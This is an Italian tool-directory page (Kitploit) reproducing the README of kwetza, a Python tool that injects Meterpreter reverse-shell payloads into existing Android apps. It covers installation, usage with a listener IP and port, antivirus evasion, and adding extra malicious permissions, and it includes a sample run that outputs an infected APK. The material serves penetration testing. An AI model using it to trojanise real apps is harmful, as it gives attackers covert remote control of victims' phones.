Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
kwetza — Script Python per iniettare payload Meterpreter in applicazioni Android esistenti. | Kitploit
Strumenti/GitHubGitHub/sensepost/kwetza
Sicurezza AndroidGenerazione di PayloadExploitPentesting di App MobiliPenetration TestingSviluppo Payload
GitHubsensepost/kwetza

kwetza

Script Python per iniettare payload Meterpreter in applicazioni Android esistenti.

Vedi Repository
6442398 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Introduzione

Arsenal

Di Chris Le Roy (@brompwnie) [email protected]

Kwetza è uno strumento che permette di infettare un'applicazione Android esistente con un payload Meterpreter.

Cosa fa?

Kwetza infetta un'applicazione Android esistente con template di payload personalizzati o predefiniti per evitare il rilevamento da parte degli antivirus. Kwetza consente di infettare applicazioni Android utilizzando le autorizzazioni predefinite dell'applicazione target o di iniettare autorizzazioni aggiuntive per ottenere funzionalità extra.

Dove posso trovare il blogpost?

I passaggi manuali automatizzati da Kwetza si trovano qui: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

Ottenere il codice

Per prima cosa, ottieni il codice:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza è scritto in Python e richiede BeautifulSoup, che può essere installato tramite Pip:

root@kitploit:~
pip install beautifulsoup4

Kwetza richiede che Apktool sia installato e accessibile tramite il tuo PATH. Puoi configurarlo seguendo le istruzioni di installazione qui: https://ibotpeaches.github.io/Apktool/install

Utilizzo

python kwetza.py nomeDellApkDaInfettare.apk https/tcp LHOST LPORT sì/no classePersonalizzata

  • nomeDellApkDaInfettare.apk = nome dell'APK che desideri infettare.
  • https/tcp = seleziona una connessione HTTPS o TCP.
  • LHOST = IP del tuo listener.
  • LPORT = Porta del tuo listener.
  • sì = includi "sì" per iniettare autorizzazioni maligne aggiuntive nell'app, "no" per utilizzare le autorizzazioni predefinite dell'app.
  • classePersonalizzata = Specifica un'activity personalizzata qui se vuoi che Kwetza inietti in questa activity.
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 sì com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Informazioni

Kwetza è stato sviluppato per funzionare con Python 2.

Kwetza, per impostazione predefinita, utilizza il template e il keystore situati nella cartella "payload" per iniettare e firmare l'apk infetto.

Se desideri firmare l'applicazione infetta con il tuo certificato, genera un nuovo keystore e posizionalo nella cartella "payload" rinominandolo come il keystore esistente, oppure modifica il riferimento in kwetza.py.

Lo stesso può essere fatto per i template di payload.

La password per il keystore predefinito è, beh, "password".

Licenza

Kwetza è concesso in licenza secondo i termini della Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).

Autorizzazioni oltre lo scopo di questa licenza possono essere disponibili all'indirizzo http://sensepost.com/contact

Scarica lo strumento